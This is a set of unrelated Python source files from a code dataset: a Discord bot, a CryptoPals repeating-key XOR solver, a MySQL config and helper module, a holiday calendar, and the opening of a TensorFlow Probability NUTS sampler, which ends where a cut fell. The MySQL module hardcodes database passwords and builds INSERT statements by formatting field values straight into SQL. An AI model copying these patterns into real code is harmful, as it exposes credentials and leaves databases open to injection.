+{"seq_id":"559672555","text":"from discord.ext import commands\nimport discord\nimport traceback\nimport json\n\ndescription = '''\nThis is a bot made by CircuitRCAY (ser-ket-ar-cee-ay-why). Also known as me as a bot being useful (for once in my life)\n'''\n\n# this specifies what extensions to load when the bot starts up\nstartup_extensions = [\"cogs.members\", \"cogs.rng\", \"cogs.other\"]\n\n# Config\njson_file='cfg.json'\njson_data=open(json_file)\ndata = json.load(json_data)\n\nbot = commands.Bot(command_prefix=data[\"CMD_Prefix\"], description=description)\n\n@bot.event\nasync def on_ready():\n print('Logged in as: ' + bot.user.name + \" - \" + bot.user.id)\n print('Prefix: ' + bot.command_prefix)\n \n\nif __name__ == \"__main__\":\n for extension in startup_extensions:\n try:\n bot.load_extension(extension)\n except Exception as e:\n exc = '{}: {}'.format(type(e).__name__, e)\n print('Failed to load extension {}\\n{}'.format(extension, exc))\n\n\n\n\nbot.run(data['botToken'])\njson_data.close()\n\n\n\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"219979572","text":"def xor (x, y):\n\tz = bytearray(len(x))\n\tfor i in range(len(x)):\n\t\tz[i] = x[i] ^ y[i]\n\treturn z\n\ndef score(s):\n freq = {}\n freq[' '] = 700000000\n freq['e'] = 390395169\n freq['t'] = 282039486\n freq['a'] = 248362256\n freq['o'] = 235661502\n freq['i'] = 214822972\n freq['n'] = 214319386\n freq['s'] = 196844692\n freq['h'] = 193607737\n freq['r'] = 184990759\n freq['d'] = 134044565\n freq['l'] = 125951672\n freq['u'] = 88219598\n freq['c'] = 79962026\n freq['m'] = 79502870\n freq['f'] = 72967175\n freq['w'] = 69069021\n freq['g'] = 61549736\n freq['y'] = 59010696\n freq['p'] = 55746578\n freq['b'] = 47673928\n freq['v'] = 30476191\n freq['k'] = 22969448\n freq['x'] = 5574077\n freq['j'] = 4507165\n freq['q'] = 3649838\n freq['z'] = 2456495\n score = 0\n for c in s.lower():\n if c in freq:\n score += freq[c]\n return score\n\ndef break_single_key_xor(b1):\n max_score = None\n english_plaintext = None\n key = None\n\n for i in range(256):\n b2 = [i] * len(b1)\n plaintext = bytes(xor(b1, b2))\n pscore = score(plaintext)\n\n if pscore > max_score or not max_score:\n max_score = pscore\n english_plaintext = plaintext\n key = chr(i)\n return key, english_plaintext\n\ndef hamming_distance(enc_str1, enc_str2):\n differing_bits = 0\n for byte in xor(enc_str1, enc_str2):\n differing_bits += bin(byte).count(\"1\")\n return differing_bits\n\nbuf_dist_norm_min = 100\npossible_KEYSIZE = 0\nfile = open(\"6.txt\", \"r\").read()\nfile_decoded = bytearray(file.decode(\"base64\"))\n\nnormalized_distances = []\nfor KEYSIZE in range(2, 40):\n\n\tbuf1 = file_decoded[: KEYSIZE]\n\tbuf2 = file_decoded[KEYSIZE: KEYSIZE * 2]\n\tbuf3 = file_decoded[KEYSIZE * 2: KEYSIZE * 3]\n\tbuf4 = file_decoded[KEYSIZE * 3: KEYSIZE * 4]\n\n\tnormalized_distance = float(\n\t\thamming_distance(buf1, buf2) +\n\t\thamming_distance(buf2, buf3) +\n\t\thamming_distance(buf3, buf4) ) / (KEYSIZE * 3)\n\n\tnormalized_distances.append(\n\t\t(normalized_distance, KEYSIZE)\n\t\t)\n\nnormalized_distances.sort()\n#print(normalized_distances)\n\nkeysize = 29\nmax_score = 0\ntext = \"\"\nchar = 0\n\nkeysize_blocks = []\nfor i in range(len(file_decoded) / keysize):\n\tkeysize_blocks.append(file_decoded[i * keysize: (i + 1) * keysize])\n\ntransposed_blocks = zip(*keysize_blocks)\nkeys = \"\"\n\nfor bbytes in transposed_blocks:\n\tkeys += break_single_key_xor(bbytes)[0]\n\nkey = bytearray(keys * len(file_decoded))\nplaintext = bytes(xor(file_decoded, key))\n\n#print keys\n#print key \n#print plaintext\t\n\n","sub_path":"CTFs/CryptoPals/Set1/challenge6.py","file_name":"challenge6.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"540152570","text":"#coding:utf-8\r\n__author__ = 'cbb'\r\n\r\nimport platform, os\r\nfrom sqlalchemy import create_engine\r\nfrom util.MyLogger import Logger\r\nimport pymysql\r\nimport datetime\r\nimport sys\r\nreload(sys)\r\nsys.setdefaultencoding(\"utf-8\")\r\n\r\n#DB_WAY:数据存储方式 'csv' # or 'mysql' or 'redis' or 'sqlite'\r\nDB_WAY = 'mysql'\r\nDB_USER = 'root'\r\nDB_PWD = 'root' # or '123456' in win7\r\nDB_NAME = 'stock'\r\nDownloadDir = os.path.pardir + '/stockdata/' # os.path.pardir: 上级目录\r\n\r\n# mysql Host\r\n# if platform.system() == 'Windows':\r\n# host_mysql = 'localhost'\r\n# else:\r\n# host_mysql = '101.200.183.216'\r\nhost_mysql = 'localhost'\r\nuser_mysql = 'root'\r\npwd_mysql = '133499'\r\ndb_name_mysql = 'wealth_db'\r\n\r\n#engine = create_engine('mysql+mysqldb://%s:%s@%s/%s' % (user_mysql, pwd_mysql, host_mysql, db_name_mysql), connect_args={'charset':'utf8'})\r\nclass get_mysql(object):\r\n '''链接数据库,并根据提供的数据库名称和关键词信息创建一个表格,表格存在就不创建'''\r\n def __init__(self,dbname,key,citys):\r\n self.T = datetime.datetime.strftime(datetime.datetime.now(), \"%Y%m%d%H%M\")\r\n self.dbname = dbname\r\n self.key = key\r\n if len(citys) == 1:\r\n self.city = citys[0]\r\n elif len(citys) > 1:\r\n self.city = \"&\".join(citys)\r\n else:\r\n self.city = \"\"\r\n self.table_name = \"{}_{}_{}\".format(self.T,self.key,self.city)\r\n self.conn = pymysql.Connect(\r\n host=\"localhost\",\r\n port=3306,\r\n user='root',\r\n password='133499',\r\n db=self.dbname,\r\n charset='utf8'\r\n )\r\n self.cursor = self.conn.cursor()\r\n # 直接创建一个表格\r\n self.create_table()\r\n\r\n # 创建表格的函数,表格名称按照时间和关键词命名\r\n def create_table(self):\r\n sql = '''CREATE TABLE `{tbname}`(\r\n {job_name} varchar(100) not null,\r\n {gs_name} varchar(100),\r\n {salary} char(20),\r\n {job_site} char(20),\r\n {create_date} char(20),\r\n {job_link} varchar(100),\r\n {gs_link} varchar(100)\r\n )'''\r\n try:\r\n self.cursor.execute(sql.format(tbname=self.table_name,job_name=\"职位名称\",gs_name=\"公司名称\",salary=\"薪资\",\r\n job_site=\"工作地点\",create_date=\"发布时间\",job_link=\"招聘链接\",gs_link=\"公司链接\"))\r\n except Exception as e:\r\n print(\"创建表格失败,表格可能已经存在!\",e)\r\n else:\r\n self.conn.commit()\r\n print(\"成功创建一个表格,名称是{}\".format(self.table_name))\r\n\r\n # 插入信息函数,每次插入一条信息,插入信息失败会回滚\r\n def insert_data(self,data):\r\n '''插入数据,不成功就回滚操作'''\r\n sql = '''INSERT INTO `{}` VALUES('{}','{}','{}','{}','{}','{}','{}')'''\r\n try:\r\n self.cursor.execute(sql.format(self.table_name,data[\"job_name\"],data[\"gs_name\"],data[\"salary\"],data[\"job_site\"],\r\n data[\"create_date\"],data[\"job_link\"],data[\"gs_link\"]))\r\n except Exception as e:\r\n self.conn.rollback()\r\n print(\"插入信息失败,原因:\",e)\r\n else:\r\n self.conn.commit()\r\n print(\"成功插入一条信息\")\r\n\r\n def close_mytable(self):\r\n '''关闭游标和断开链接,数据全部插入后必须执行这个操作'''\r\n self.cursor.close()\r\n self.conn.close()\r\n\r\n# 短均线, 长均线\r\nAVR_SHORT = 12\r\nAVR_LONG = 40\r\n\r\n#买卖标记\r\nSIGNAL_BUY = 1 #买\r\nSIGNAL_SALE = -1 #卖\r\nSIGNAL_DEFAULT = 0\r\n\r\n#阈值\r\nThreshold_Buy_Count = 3\r\nThreshold_Sale_Count = 2\r\n\r\n#日志设置\r\nfrom util.MyLogger import Logger\r\ninfoLogger = Logger(logname='../Log/info.log', logger='I')\r\nerrorLogger = Logger(logname='../Log/error.log', logger='E')\r\n\r\n#配置文件 位置\r\nconfig_file_path = '../config.ini'\r\n","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"86385322","text":"# -*- coding: utf-8 -*-\n# Copyright (C) 2003-2016 Mag. Christian Tanzer. All rights reserved\n# Glasauergasse 32, A--1130 Wien, Austria. tanzer@swing.co.at\n# ****************************************************************************\n#\n# This module is licensed under the terms of the BSD 3-Clause License\n# .\n# ****************************************************************************\n#\n#++\n# Name\n# CAL.Holiday\n#\n# Purpose\n# Provide information about fixed and moving Austrian holidays\n#\n# Revision Dates\n# 20-Apr-2003 (CT) Creation\n# 6-Feb-2004 (CT) Use (y, m, d) tuples instead of strings as dictionary\n# keys\n# 9-Feb-2004 (CT) Dependency on `Y.map` removed\n# 5-Jun-2004 (CT) `easter_date` implementation using Spencer Jones'\n# algorithm added\n# 10-Oct-2004 (MG) Use new `CAL.Date_Time` module instead of `Date_Time`\n# 15-Oct-2004 (CT) Use `CAL.Date` instead of `CAL.Date_Time`\n# 15-Oct-2004 (CT) `_main` and `_command_spec` added\n# 17-Oct-2004 (CT) Use `Date_Delta` instead of `Delta`\n# 31-Oct-2004 (CT) `_main` changed to display date, too\n# 5-Nov-2004 (CT) Use `//` for int division\n# 16-Jun-2010 (CT) Use unicode for holiday names\n# 16-Jun-2013 (CT) Use `TFL.CAO`, not `TFL.Command_Line`\n# 29-Jan-2016 (CT) Modernize, DRY\n# 1-Feb-2016 (CT) Add country dependent holidays; remove obsolete code\n# 2-Feb-2016 (CT) Factor `CAL.Day_Rule`\n# 2-Feb-2016 (CT) Add I18N, german and swiss holidays\n# 11-Feb-2016 (CT) Factor `TFL.I18N.test_language`\n# ««revision-date»»···\n#--\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom _CAL import CAL\nfrom _TFL import TFL\nfrom _TFL.pyk import pyk\n\nfrom _TFL.I18N import _, _T, _Tn\n\nimport _CAL.Date\nimport _CAL.Day_Rule\nimport _CAL.Delta\n\nimport _TFL.CAO\nimport _TFL._Meta.Object\nimport _TFL._Meta.Once_Property\n\nclass Holidays (CAL.Day_Rule.Set) :\n\n F = CAL.Day_Rule.Fixed\n E = CAL.Day_Rule.Easter_Dependent\n\n ### https://en.wikipedia.org/wiki/List_of_holidays_by_country\n _rules = \\\n ( F (_ (\"New Year's Day\"), 1, 1)\n , F (_ (\"Epiphany\"), 1, 6, \"AT\")\n , F (_ (\"Martin Luther King Day\")\n , 1, 1, \"US\", delta = dict (weekday = F.RD.MO (3))\n )\n , F (_ (\"Inauguration Day\")\n , 1, 20, \"US\", y_filter = lambda y : (y % 4 == 1)\n )\n , F (_ (\"Washington's Birthday\")\n , 2, 1, \"US\", delta = dict (weekday = F.RD.MO (3))\n )\n , F (_ (\"Saint Patrick's Day\"), 3, 17, \"IE\")\n , F (_ (\"Labor Day\"), 5, 1, \"AT\", \"DE\")\n , F (_ (\"May Day Bank Holiday\")\n , 5, 1, \"UK\", delta = dict (weekday = F.RD.MO (1))\n )\n , F (_ (\"May Day\")\n , 5, 1, \"IE\"\n , delta = dict (weekday = F.RD.MO (1))\n , y_filter = lambda y : y >= 1994\n )\n , F (_ (\"Spring Bank Holiday\")\n , 5, 31, \"UK\", delta = dict (weekday = F.RD.MO (-1))\n )\n , F (_ (\"Memorial Day\")\n , 5, 31, \"US\", delta = dict (weekday = F.RD.MO (-1))\n )\n , F (_ (\"June Holiday\")\n , 6, 1, \"IE\", delta = dict (weekday = F.RD.MO (1))\n )\n , F (_ (\"Independence Day\"), 7, 4, \"US\")\n , F (_ (\"Swiss National Day\"), 8, 1, \"CH\")\n , F (_ (\"August Holiday\")\n , 8, 1, \"IE\", delta = dict (weekday = F.RD.MO (1))\n )\n , F (_ (\"Assumption Day\"), 8, 15, \"AT\")\n , F (_ (\"Late Summer Bank Holiday\")\n , 8, 31, \"UK\", delta = dict (weekday = F.RD.MO (-1))\n )\n , F (_ (\"Labor Day\")\n , 9, 1, \"US\", delta = dict (weekday = F.RD.MO (1))\n )\n , F (_ (\"Federal Day of Thanksgiving, Repentance and 
Prayer\")\n , 9, 1, \"CH\", delta = dict (weekday = F.RD.SU (3))\n )\n , F (_ (\"German Unity Day\"), 10, 3, \"DE\"\n , y_filter = lambda y : y >= 1990\n )\n , F (_ (\"Columbus Day\")\n , 10, 1, \"US\", delta = dict (weekday = F.RD.MO (2))\n )\n , F (_ (\"Austrian National Day\"), 10, 26, \"AT\")\n , F (_ (\"October Holiday\")\n , 10, 31, \"IE\", delta = dict (weekday = F.RD.MO (-1))\n )\n , F (_ (\"All Saints' Day\"), 11, 1, \"AT\")\n , F (_ (\"Veterans Day\"), 11, 11, \"US\")\n , F (_ (\"Thanksgiving\")\n , 11, 1, \"US\", delta = dict (weekday = F.RD.TH (4))\n )\n , F (_ (\"Feast of the Immaculate Conception\"), 12, 8, \"AT\")\n , F (_ (\"Christmas Day\"), 12, 25, \"AT\", \"CH\", \"DE\", \"IE\", \"UK\", \"US\")\n , F (_ (\"St. Stephen's Day\"), 12, 26, \"AT\", \"CH\", \"DE\", \"IE\")\n , F (_ (\"Boxing Day\"), 12, 26, \"UK\")\n # easter dependent movable holidays\n , E (_ (\"Good Friday\"), -2, \"CH\", \"DE\", \"UK\")\n , E (_ (\"Easter Sunday\"), 0, \"AT\", \"CH\", \"DE\", \"UK\")\n , E (_ (\"Easter Monday\"), 1, \"AT\", \"CH\", \"DE\", \"IE\", \"UK\")\n , E (_ (\"Ascension Day\"), 39, \"AT\", \"CH\", \"DE\")\n , E (_ (\"Whit Sunday\"), 49, \"AT\", \"CH\", \"DE\")\n , E (_ (\"Whit Monday\"), 50, \"AT\", \"CH\", \"DE\")\n , E (_ (\"Corpus Christi\"), 60, \"AT\")\n )\n\n# end class Holidays\n\nholidays = Holidays ()\n\ndef _show (year, country, lang = \"de\") :\n \"\"\"\n >>> _show (2016, \"AT\")\n 1 2016/01/01 Neujahr\n 6 2016/01/06 Hl. Drei Könige\n 87 2016/03/27 Ostersonntag\n 88 2016/03/28 Ostermontag\n 122 2016/05/01 Tag der Arbeit\n 126 2016/05/05 Christi Himmelfahrt\n 136 2016/05/15 Pfingstsonntag\n 137 2016/05/16 Pfingstmontag\n 147 2016/05/26 Fronleichnam\n 228 2016/08/15 Mariä Himmelfahrt\n 300 2016/10/26 Nationalfeiertag\n 306 2016/11/01 Allerheiligen\n 343 2016/12/08 Mariä Empfängnis\n 360 2016/12/25 1. Weihnachtstag\n 361 2016/12/26 2. Weihnachtstag\n\n >>> _show (2016, \"DE\")\n 1 2016/01/01 Neujahr\n 85 2016/03/25 Karfreitag\n 87 2016/03/27 Ostersonntag\n 88 2016/03/28 Ostermontag\n 122 2016/05/01 Tag der Arbeit\n 126 2016/05/05 Christi Himmelfahrt\n 136 2016/05/15 Pfingstsonntag\n 137 2016/05/16 Pfingstmontag\n 277 2016/10/03 Tag der Deutschen Einheit\n 360 2016/12/25 1. Weihnachtstag\n 361 2016/12/26 2. Weihnachtstag\n\n >>> _show (2016, \"CH\", lang = \"en\")\n 1 2016/01/01 New Year's Day\n 85 2016/03/25 Good Friday\n 87 2016/03/27 Easter Sunday\n 88 2016/03/28 Easter Monday\n 126 2016/05/05 Ascension Day\n 136 2016/05/15 Whit Sunday\n 137 2016/05/16 Whit Monday\n 214 2016/08/01 Swiss National Day\n 262 2016/09/18 Federal Day of Thanksgiving, Repentance and Prayer\n 360 2016/12/25 Christmas Day\n 361 2016/12/26 St. Stephen's Day\n\n >>> _show (2016, \"IE\")\n 1 2016/01/01 Neujahr\n 77 2016/03/17 Saint Patrick's Day\n 88 2016/03/28 Ostermontag\n 123 2016/05/02 Mai-Feiertag\n 158 2016/06/06 Juni-Feiertag\n 214 2016/08/01 August-Feiertag\n 305 2016/10/31 Oktober-Feiertag\n 360 2016/12/25 1. Weihnachtstag\n 361 2016/12/26 2. Weihnachtstag\n\n >>> _show (2016, \"UK\")\n 1 2016/01/01 Neujahr\n 85 2016/03/25 Karfreitag\n 87 2016/03/27 Ostersonntag\n 88 2016/03/28 Ostermontag\n 123 2016/05/02 Bankfeiertag\n 151 2016/05/30 Bankfeiertag\n 242 2016/08/29 Bankfeiertag\n 360 2016/12/25 1. Weihnachtstag\n 361 2016/12/26 2. 
Weihnachtstag\n\n >>> _show (2017, \"UK\", lang = \"en\")\n 1 2017/01/01 New Year's Day\n 104 2017/04/14 Good Friday\n 106 2017/04/16 Easter Sunday\n 107 2017/04/17 Easter Monday\n 121 2017/05/01 May Day Bank Holiday\n 149 2017/05/29 Spring Bank Holiday\n 240 2017/08/28 Late Summer Bank Holiday\n 359 2017/12/25 Christmas Day\n 360 2017/12/26 Boxing Day\n\n >>> _show (2016, \"US\", lang = \"en\")\n 1 2016/01/01 New Year's Day\n 18 2016/01/18 Martin Luther King Day\n 46 2016/02/15 Washington's Birthday\n 151 2016/05/30 Memorial Day\n 186 2016/07/04 Independence Day\n 249 2016/09/05 Labor Day\n 284 2016/10/10 Columbus Day\n 316 2016/11/11 Veterans Day\n 329 2016/11/24 Thanksgiving\n 360 2016/12/25 Christmas Day\n\n >>> _show (2017, \"US\", lang = \"en\")\n 1 2017/01/01 New Year's Day\n 16 2017/01/16 Martin Luther King Day\n 20 2017/01/20 Inauguration Day\n 51 2017/02/20 Washington's Birthday\n 149 2017/05/29 Memorial Day\n 185 2017/07/04 Independence Day\n 247 2017/09/04 Labor Day\n 282 2017/10/09 Columbus Day\n 315 2017/11/11 Veterans Day\n 327 2017/11/23 Thanksgiving\n 359 2017/12/25 Christmas Day\n\n >>> _show (2016, \"ANY\")\n 1 2016/01/01 Neujahr\n\n \"\"\"\n import _CAL.Year\n with TFL.I18N.test_language (lang) :\n Y = CAL.Year (year)\n O = Y.head.ordinal - 1\n for ordinal, name in sorted (pyk.iteritems (holidays (year, country))) :\n print (\"%3d %s %s\" % (ordinal - O, Y.cal.day [ordinal], _T (name)))\n# end def _show\n\ndef _main (cmd) :\n _show (cmd.year, cmd.country, cmd.language)\n# end def _main\n\ntoday = CAL.Date ()\nyear = today.year\n_Command = TFL.CAO.Cmd \\\n ( handler = _main\n , args =\n ( \"year:I=%d?Year for which to show holidays\" % (year, )\n ,\n )\n , opts =\n ( \"-country:S=AT?Country for which to show holidays\"\n , \"-language:S=de?Language to use for holiday names\"\n )\n , max_args = 1\n )\n\nif __name__ != \"__main__\" :\n CAL._Export (\"*\")\nelse :\n _Command ()\n### __END__ CAL.Holiday\n","sub_path":"Functions/venv/lib/python3.6/site-packages/_CAL/Holiday.py","file_name":"Holiday.py","file_ext":"py","file_size_in_byte":9932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
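The easter-dependent rules in the record above all hinge on computing the date of Easter Sunday for a given year. The CAL package itself is not reproduced here, so as a minimal standalone sketch, the Anonymous Gregorian algorithm (equivalent in spirit to the Spencer Jones formulation mentioned in the record's revision notes) can be written as:

```python
def easter_date(year):
    """Date of Easter Sunday in the Gregorian calendar (Anonymous Gregorian algorithm)."""
    a = year % 19
    b, c = divmod(year, 100)
    d, e = divmod(b, 4)
    f = (b + 8) // 25
    g = (b - f + 1) // 3
    h = (19 * a + b - d - g + 15) % 30
    i, k = divmod(c, 4)
    l = (32 + 2 * e + 2 * i - h - k) % 7
    m = (a + 11 * h + 22 * l) // 451
    month, day = divmod(h + l - 7 * m + 114, 31)
    return month, day + 1

print(easter_date(2016))  # (3, 27) -- matches the doctest above (Ostersonntag 2016/03/27)
print(easter_date(2017))  # (4, 16)
```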
+{"seq_id":"101578681","text":"# Copyright 2019 The TensorFlow Probability Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"No U-Turn Sampler.\n\nThe implementation closely follows [1; Algorithm 3], with Multinomial sampling\non the tree (instead of slice sampling) and a generalized No-U-Turn termination\ncriterion [2; Appendix A].\n\nAchieves batch execution across chains by precomputing the recursive tree\ndoubling data access patterns and then executes this \"unrolled\" data pattern via\na `tf.while_loop`.\n\n#### References\n\n[1]: Matthew D. Hoffman, Andrew Gelman. The No-U-Turn Sampler: Adaptively\n Setting Path Lengths in Hamiltonian Monte Carlo.\n In _Journal of Machine Learning Research_, 15(1):1593-1623, 2014.\n http://jmlr.org/papers/volume15/hoffman14a/hoffman14a.pdf\n\n[2]: Michael Betancourt. A Conceptual Introduction to Hamiltonian Monte Carlo.\n _arXiv preprint arXiv:1701.02434_, 2018. https://arxiv.org/abs/1701.02434\n\"\"\"\n\nimport collections\nimport numpy as np\n\nimport tensorflow.compat.v2 as tf\n\nfrom tensorflow_probability.python.internal import broadcast_util as bu\nfrom tensorflow_probability.python.internal import distribute_lib\nfrom tensorflow_probability.python.internal import prefer_static as ps\nfrom tensorflow_probability.python.internal import samplers\nfrom tensorflow_probability.python.internal import tensorshape_util\nfrom tensorflow_probability.python.math import generic\nfrom tensorflow_probability.python.mcmc import kernel\nfrom tensorflow_probability.python.mcmc.internal import leapfrog_integrator as leapfrog_impl\nfrom tensorflow_probability.python.mcmc.internal import util as mcmc_util\n\nJAX_MODE = False\n\n##############################################################\n### BEGIN STATIC CONFIGURATION ###############################\n##############################################################\nTREE_COUNT_DTYPE = tf.int32 # Default: tf.int32\n\n# Whether to use slice sampling (original NUTS implementation in [1]) or\n# multinomial sampling (implementation in [2]) from the tree trajectory.\nMULTINOMIAL_SAMPLE = True # Default: True\n\n# Whether to use U turn criteria in [1] or generalized U turn criteria in [2]\n# to check the tree trajectory.\nGENERALIZED_UTURN = True # Default: True\n##############################################################\n### END STATIC CONFIGURATION #################################\n##############################################################\n\n__all__ = [\n 'NoUTurnSampler',\n]\n\n\nclass NUTSKernelResults(\n mcmc_util.PrettyNamedTupleMixin,\n collections.namedtuple(\n 'NUTSKernelResults',\n [\n 'target_log_prob',\n 'grads_target_log_prob',\n 'step_size',\n 'log_accept_ratio',\n 'leapfrogs_taken', # How many leapfrogs each chain took this step.\n 'is_accepted',\n 'reach_max_depth',\n 'has_divergence',\n 'energy',\n 'seed',\n ])):\n \"\"\"Internal state and diagnostics for No-U-Turn Sampler.\"\"\"\n __slots__ = 
()\n\n\nclass MomentumStateSwap(\n mcmc_util.PrettyNamedTupleMixin,\n collections.namedtuple('MomentumStateSwap',\n ['momentum_swap', 'state_swap'])):\n \"\"\"Internal state and diagnostics for No-U-Turn Sampler.\"\"\"\n __slots__ = ()\n\n\nclass OneStepMetaInfo(\n mcmc_util.PrettyNamedTupleMixin,\n collections.namedtuple('OneStepMetaInfo',\n ['log_slice_sample',\n 'init_energy',\n 'write_instruction',\n 'read_instruction',\n ])):\n \"\"\"Internal state and diagnostics for No-U-Turn Sampler.\"\"\"\n __slots__ = ()\n\n\nclass TreeDoublingState(\n mcmc_util.PrettyNamedTupleMixin,\n collections.namedtuple('TreeDoublingState',\n ['momentum',\n 'state',\n 'target',\n 'target_grad_parts',\n ])):\n \"\"\"Internal state and diagnostics for No-U-Turn Sampler.\"\"\"\n __slots__ = ()\n\n\nclass TreeDoublingStateCandidate(\n mcmc_util.PrettyNamedTupleMixin,\n collections.namedtuple(\n 'TreeDoublingStateCandidate',\n [\n 'state',\n 'target',\n 'target_grad_parts',\n 'energy',\n 'weight',\n ])):\n \"\"\"Internal state and diagnostics for No-U-Turn Sampler.\"\"\"\n __slots__ = ()\n\n\nclass TreeDoublingMetaState(\n mcmc_util.PrettyNamedTupleMixin,\n collections.namedtuple(\n 'TreeDoublingMetaState',\n [\n 'candidate_state', # A namedtuple of TreeDoublingStateCandidate.\n 'is_accepted',\n 'momentum_sum', # Sum of momentum of the current tree for\n # generalized U turn criteria.\n 'energy_diff_sum', # Sum over all states explored within the\n # subtree of Metropolis acceptance probabilities\n # exp(min(0, H' - H0)), where H0 is the negative\n # energy of the initial state and H' is the\n # negative energy of a state explored in the\n # subtree.\n # TODO(b/150152798): Do sum in log-space.\n 'leapfrog_count', # How many leapfrogs each chain has taken.\n 'continue_tree',\n 'not_divergence',\n ])):\n \"\"\"Internal state and diagnostics for No-U-Turn Sampler.\"\"\"\n __slots__ = ()\n\n\nclass NoUTurnSampler(kernel.TransitionKernel):\n \"\"\"Runs one step of the No U-Turn Sampler.\n\n The No U-Turn Sampler (NUTS) is an adaptive variant of the Hamiltonian Monte\n Carlo (HMC) method for MCMC. NUTS adapts the distance traveled in response to\n the curvature of the target density. Conceptually, one proposal consists of\n reversibly evolving a trajectory through the sample space, continuing until\n that trajectory turns back on itself (hence the name, 'No U-Turn'). This class\n implements one random NUTS step from a given `current_state`.\n Mathematical details and derivations can be found in\n [Hoffman, Gelman (2011)][1] and [Betancourt (2018)][2].\n\n The `one_step` function can update multiple chains in parallel. It assumes\n that a prefix of leftmost dimensions of `current_state` index independent\n chain states (and are therefore updated independently). The output of\n `target_log_prob_fn(*current_state)` should sum log-probabilities across all\n event dimensions. Slices along the rightmost dimensions may have different\n target distributions; for example, `current_state[0][0, ...]` could have a\n different target distribution from `current_state[0][1, ...]`. These\n semantics are governed by `target_log_prob_fn(*current_state)`. (The number of\n independent chains is `tf.size(target_log_prob_fn(*current_state))`.)\n\n #### References\n\n [1]: Matthew D. Hoffman, Andrew Gelman. The No-U-Turn Sampler: Adaptively\n Setting Path Lengths in Hamiltonian Monte Carlo. 2011.\n https://arxiv.org/pdf/1111.4246.pdf.\n\n [2]: Michael Betancourt. 
A Conceptual Introduction to Hamiltonian Monte Carlo.\n _arXiv preprint arXiv:1701.02434_, 2018. https://arxiv.org/abs/1701.02434\n \"\"\"\n\n def __init__(self,\n target_log_prob_fn,\n step_size,\n max_tree_depth=10,\n max_energy_diff=1000.,\n unrolled_leapfrog_steps=1,\n parallel_iterations=10,\n experimental_shard_axis_names=None,\n name=None):\n \"\"\"Initializes this transition kernel.\n\n Args:\n target_log_prob_fn: Python callable which takes an argument like\n `current_state` (or `*current_state` if it's a list) and returns its\n (possibly unnormalized) log-density under the target distribution.\n step_size: `Tensor` or Python `list` of `Tensor`s representing the step\n size for the leapfrog integrator. Must broadcast with the shape of\n `current_state`. Larger step sizes lead to faster progress, but\n too-large step sizes make rejection exponentially more likely. When\n possible, it's often helpful to match per-variable step sizes to the\n standard deviations of the target distribution in each variable.\n max_tree_depth: Maximum depth of the tree implicitly built by NUTS. The\n maximum number of leapfrog steps is bounded by `2**max_tree_depth` i.e.\n the number of nodes in a binary tree `max_tree_depth` nodes deep. The\n default setting of 10 takes up to 1024 leapfrog steps.\n max_energy_diff: Scalar threshold of energy differences at each leapfrog;\n divergent samples are defined as leapfrog steps that exceed this\n threshold. Defaults to 1000.\n unrolled_leapfrog_steps: The number of leapfrogs to unroll per tree\n expansion step. Applies a direct linear multiplier to the maximum\n trajectory length implied by max_tree_depth. Defaults to 1.\n parallel_iterations: The number of iterations allowed to run in parallel.\n It must be a positive integer. See `tf.while_loop` for more details.\n experimental_shard_axis_names: A structure of string names indicating how\n members of the state are sharded.\n name: Python `str` name prefixed to Ops created by this function.\n Default value: `None` (i.e., 'NoUTurnSampler').\n \"\"\"\n with tf.name_scope(name or 'NoUTurnSampler') as name:\n # Process `max_tree_depth` argument.\n max_tree_depth = tf.get_static_value(max_tree_depth)\n if max_tree_depth is None or max_tree_depth < 1:\n raise ValueError(\n 'max_tree_depth must be known statically and >= 1 but was '\n '{}'.format(max_tree_depth))\n self._max_tree_depth = max_tree_depth\n\n # Compute parameters derived from `max_tree_depth`.\n instruction_array = build_tree_uturn_instruction(\n max_tree_depth, init_memory=-1)\n [\n write_instruction_numpy,\n read_instruction_numpy\n ] = generate_efficient_write_read_instruction(instruction_array)\n\n # The TensorArray version of the read/write instruction needs to be created\n # within the function call to be compatible with XLA. 
Here we store the\n # numpy version of the instruction and convert it to TensorArray later.\n self._write_instruction = write_instruction_numpy\n self._read_instruction = read_instruction_numpy\n\n # Process all other arguments.\n self._target_log_prob_fn = target_log_prob_fn\n self._step_size = step_size\n\n self._parameters = dict(\n target_log_prob_fn=target_log_prob_fn,\n step_size=step_size,\n max_tree_depth=max_tree_depth,\n max_energy_diff=max_energy_diff,\n unrolled_leapfrog_steps=unrolled_leapfrog_steps,\n parallel_iterations=parallel_iterations,\n experimental_shard_axis_names=experimental_shard_axis_names,\n name=name,\n )\n self._parallel_iterations = parallel_iterations\n self._unrolled_leapfrog_steps = unrolled_leapfrog_steps\n self._name = name\n self._max_energy_diff = max_energy_diff\n\n @property\n def target_log_prob_fn(self):\n return self._target_log_prob_fn\n\n @property\n def step_size(self):\n return self._step_size\n\n @property\n def max_tree_depth(self):\n return self._max_tree_depth\n\n @property\n def max_energy_diff(self):\n return self._max_energy_diff\n\n @property\n def unrolled_leapfrog_steps(self):\n return self._unrolled_leapfrog_steps\n\n @property\n def name(self):\n return self._name\n\n @property\n def parallel_iterations(self):\n return self._parallel_iterations\n\n @property\n def write_instruction(self):\n return self._write_instruction\n\n @property\n def read_instruction(self):\n return self._read_instruction\n\n @property\n def parameters(self):\n return self._parameters\n\n @property\n def is_calibrated(self):\n return True\n\n def one_step(self, current_state, previous_kernel_results, seed=None):\n seed = samplers.sanitize_seed(seed) # Retain for diagnostics.\n start_trajectory_seed, loop_seed = samplers.split_seed(seed)\n\n with tf.name_scope(self.name + 